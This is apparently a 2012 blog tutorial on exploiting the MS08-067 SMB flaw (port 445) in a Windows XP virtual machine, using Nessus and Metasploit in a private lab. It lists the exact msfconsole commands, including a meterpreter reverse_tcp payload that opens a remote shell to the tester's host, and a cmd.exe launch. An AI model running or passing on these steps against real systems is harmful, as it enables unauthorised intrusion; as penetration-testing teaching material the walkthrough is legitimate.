Selasa, 11 September 2012

How to exploit Port 445 SMB using Metasploit

On this post I will try to do exploitation on port 445 (SMB) using Metasploit on Backtrack R2 ..
First we need to know information about victim, in penetration testing know as Informaton Gathering, we can use nmap, Zenmap or ect to scanning candidate victim on network.


Then we do scanning Vulnerability Assesment on the target IP 192.168.56.101 , I use Nessus to do it. 

In the scan above ,We can see vulnerability of victim is have 2 high risk vulnerability, press on port 445 and look deeply information like this


I look 2 vulnerability In the scan above and choose a 2nd plugin I have, Plugin name is MS08-067, I try to find information about that plugin vulnerability on google and find at metasploit payload description, and try to exploit it, and next open metasploit console with command on terminal #msfconsole 


Use exploit match with nessus result and syntax in metasploit is
use exploit/windows/smb/ms08_067_netapi


After choose exploit we need to set payload with syntax
set PAYLOAD windows/meterpreter/reverse_tcp
After set Payload we need to determine Local Host and target use syntax
set LHOST 192.168.56.102 -------------------------------------> My IP
set RHOST 192.168.56.101 -------------------------------------> Target IP
and execute Exploit with syntax
exploit
To enter meterpreter mode


After we on meterpreter mode its mean we has make hole to taget system with payload we used, now we need to enter C:\ on system32 to full takedown target system
use syntax
 
meterpreter > execute -f -f cmd.exe -M -i
This command mean we make system execute command prompth on system (XP) and after that we enter to system32 target


From the above we can see that Windows XP SP3 is in virtualbox been hacked, by going to the command prompt windows applications. 
Furthermore, to prove that I have really got into the windows system, I will create a new folder named "PANJI_IS2C"


Congrats, We have succes to exploit Windows using METASPLOIT...

Tidak ada komentar:

Posting Komentar